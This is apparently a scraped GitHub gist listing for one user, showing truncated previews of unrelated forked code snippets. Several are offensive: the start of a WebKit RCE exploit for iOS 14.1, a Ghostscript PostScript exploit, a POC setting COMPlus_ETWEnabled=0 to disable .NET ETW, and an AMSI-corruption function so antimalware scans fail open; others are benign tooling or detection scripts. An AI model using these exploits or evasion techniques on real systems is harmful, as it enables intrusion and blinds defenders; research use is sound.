//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
function Get-RdpLogonEvent
{
[CmdletBinding()]
param(
[Int32] $Last = 10
)
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
LogName='Security'
ProviderName='Microsoft-Windows-Security-Auditing'
@qqvirus
qqvirus / RpcParser.java
Created February 25, 2022 07:40 — forked from matterpreter/RpcParser.java
Ghidra RPC procedure identification script
//Locate RPC procedures inside of server code
//@author Matt Hand (@matterpreter) based on original work by Sektor7 Labs (@reenz0h)
//@category Functions
//@keybinding
//@menupath
//@toolbar
import ghidra.app.script.GhidraScript;
import ghidra.program.model.block.*;
import ghidra.program.model.symbol.*;
@qqvirus
qqvirus / fuck.js
Created February 14, 2022 06:02 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@qqvirus
qqvirus / __declspec关键字详细用法
Created August 2, 2021 07:54 — forked from 0xlitf/__declspec关键字详细用法
Detailed usage of the __declspec keyword
Detailed usage of the __declspec keyword
__declspec specifies the Microsoft-specific storage attributes for an instance of a given type. Other storage-class modifiers such as static and extern are part of the ANSI C and C++ specifications, whereas __declspec is an extended-attribute definition. The extended-attribute syntax simplifies and standardizes the Microsoft extensions to C and C++.
Usage: __declspec ( extended-decl-modifier )
The extended-decl-modifier parameters are listed below; several may appear at once, separated by spaces:
align (C++)
allocate
appdomain
deprecated (C++)
dllimport
@qqvirus
qqvirus / env_var_spoofing_poc.cpp
Created July 29, 2020 03:46 — forked from xpn/env_var_spoofing_poc.cpp
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
/exploit {
/println { (\\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
@qqvirus
qqvirus / yey.py
Created May 17, 2019 01:20 — forked from Jinmo/yey.py
loading IDA colors (clr) file given a path to the file
from ctypes import c_ssize_t, c_void_p, c_int, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL
from PyQt5.QtCore import Qt, QTimer, QObject
from PyQt5.QtGui import QResizeEvent, QFocusEvent
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp
import os
import sys
import idaapi
import idc
@qqvirus
qqvirus / CollectDotNetEvents.ps1
Created December 10, 2018 09:52 — forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass
# logman stop dotNetTrace -ets
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe
# I got the process ID by running a procmon trace
$TargetProcessId = 8256
@qqvirus
qqvirus / CorruptCLRGlobal.ps1
Created December 10, 2018 09:51 — forked from mattifestation/CorruptCLRGlobal.ps1
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the first DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.